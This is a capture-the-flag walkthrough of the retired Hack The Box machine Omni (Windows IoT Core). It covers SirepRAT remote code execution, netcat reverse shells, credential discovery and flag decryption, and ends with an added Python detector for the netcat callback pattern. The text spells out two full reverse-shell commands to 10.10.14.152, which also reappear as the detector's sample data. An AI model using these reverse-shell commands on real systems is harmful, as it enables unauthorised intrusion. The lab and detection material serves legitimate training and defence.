Omni HacktheBox Walkthrough OSCP Like

Omni HacktheBox

Omni is a retired Windows IoT Core machine on Hack The Box. It covers exploiting the vulnerable Sirep Test Service in the IoT Core OS, achieving remote code execution and receiving a reverse shell on the target host, finding a credential file by enumerating the file system, and eventually getting the user and root flags.

We first run nmap to enumerate the open ports and the services running on them. The following results show that 2 ports are open.

-sC: default nmap scripts

-sV: detect service version

Add the domain in the /etc/hosts file.

We start off by enumerating HTTP.

An authentication pop-up appears. It asks us for credentials to continue.

We do not have any credentials. What is Windows Device Portal? Let’s google it.

The web page gives us some information. From it, we understand that the portal is related to Windows 10 IoT Core.

The web page also shows that port 8080 means dev mode is enabled by default.

https://docs.microsoft.com/en-us/windows/uwp/debug-test-perf/device-portal

Note the default credentials.

The default credentials are not working.

We search for exploits related to Windows IoT Core.

SirepRAT is a tool that allows us to exploit a Windows IoT Core target. What it simply does is dump the SAM and copy the SYSTEM registry files.

Clone the repository.

We install the required modules so that the exploit can work properly.

First, let’s see how it works by typing “--help”.

These are the available commands we can use.

Here is the plan. We will establish a reverse shell by using PowerShell. To do so, we will first upload netcat to the target machine. Then, we will run a netcat reverse shell command by using SirepRAT and, if everything goes well, it will send us a connection request while we wait for it in listening mode.

We use the 64-bit netcat. (The 32-bit netcat did not work on the first attempt.)

Start up a simple Python server in the directory where netcat is located.

This command will upload the nc64.exe file to the directory specified below.

Set up a listener to receive the reverse shell.

We run the command to receive the reverse shell.

Perfect! We get a shell.

Who are we on this Windows machine? #whoami

Privilege Escalation

Let’s check the root.txt file.

Here we try to apply the decryption process to both root.txt and user.txt, but we fail because the user omni has low-level privileges.

We start enumerating the directories one by one to get some interesting information.

Well, a bat file might be interesting for us. Let’s check what is inside it.

Cool! We get the credentials. Let’s use them one by one in the web application (omni.htb:8080).

First, we log in as user app.

And we have a command prompt to run commands. What is the next step now? Yes! Let’s try to receive a reverse shell.

We set up a listener on port 6767.

Run the command.

Full command: C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 6767 -e powershell.exe

And we have another shell as user app.

We are the user app. That means we might be able to decrypt the encrypted content in the user.txt file. To do so, we execute the following commands.

We successfully get the decrypted version of the user.txt flag.

We need to escalate privileges again in order to view the root.txt flag. But wait a sec! What if we, as the app user, can decrypt the encrypted content in the root.txt file? Let’s just give it a try.

We could not decrypt the root.txt file. Well, we need to be the administrator user. To do so, we will use the other credentials that we got from the r.bat file.

We apply the same process as before.

We set up a listener to receive the reverse shell.

We run the same command in the web application's command prompt. Just remember: we are now logged in as the administrator user.

Full command: C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 7878 -e powershell.exe

And here we are as administrator.
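
From the defender's side, the two full commands above share one recognizable shape: an executable started from C:\Windows\System32\spool\drivers\color, followed by a remote host, a port and -e with a shell. The following is an added example, not part of the original walkthrough, that flags that shape in process-creation records; the record layout, the watch list and the benign sample lines are constructed assumptions.

```python
import ntpath
import re

# Assumed watch list: System32 directories meant for data files, not programs.
DATA_ONLY_DIRS = (r"c:\windows\system32\spool\drivers\color",)
# netcat-style "-e <shell>": hands a shell's stdin/stdout to the socket.
SHELL_EXEC = re.compile(r"(?:^|\s)-e\s+\S*(?:powershell|cmd)(?:\.exe)?\b", re.I)
# Dotted-quad host followed by a port number, as in "<ip> <port>".
HOST_PORT = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\b")

def split_image(command_line):
    """Split a command line into (image path, arguments); handles a quoted image."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return (cl[1:], "") if end == -1 else (cl[1:end], cl[end + 1:].strip())
    image, _, args = cl.partition(" ")
    return image, args

def assess(command_line):
    """Return the list of reasons this command line looks like a shell callback."""
    image, args = split_image(command_line)
    image = ntpath.normpath(image).lower()  # folds "/" and ".." before comparing
    reasons = []
    if image.endswith(".exe") and ntpath.dirname(image) in DATA_ONLY_DIRS:
        reasons.append("executable in data-only directory")
    if SHELL_EXEC.search(args):
        reasons.append("shell attached to socket with -e")
    if HOST_PORT.search(args):
        reasons.append("remote host and port in arguments")
    return reasons

def triage(events, threshold=2):
    """Keep events that have at least `threshold` independent reasons."""
    hits = [(e["user"], assess(e["command_line"])) for e in events]
    return [(user, reasons) for user, reasons in hits if len(reasons) >= threshold]

# Constructed process-creation records; the first two reuse the walkthrough's commands.
SAMPLE_EVENTS = [
    {"user": "app", "command_line": r"C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 6767 -e powershell.exe"},
    {"user": "administrator", "command_line": r"C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.152 7878 -e powershell.exe"},
    {"user": "SYSTEM", "command_line": r"C:\Windows\System32\spoolsv.exe"},
    {"user": "app", "command_line": r'"C:\Program Files\App\tool.exe" -e config.ini'},
    {"user": "app", "command_line": r"C:\Windows\System32\PING.EXE 10.10.14.152 -n 4"},
]

if __name__ == "__main__":
    for user, reasons in triage(SAMPLE_EVENTS):
        print(user, "->", "; ".join(reasons))
```

Requiring two or more reasons keeps a lone -e flag or a lone IP address in a benign command line from raising an alert.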

We apply the same decryption process for the root.txt file.

We successfully view the decrypted version of the root.txt file after executing the following command.

Thank you for your time.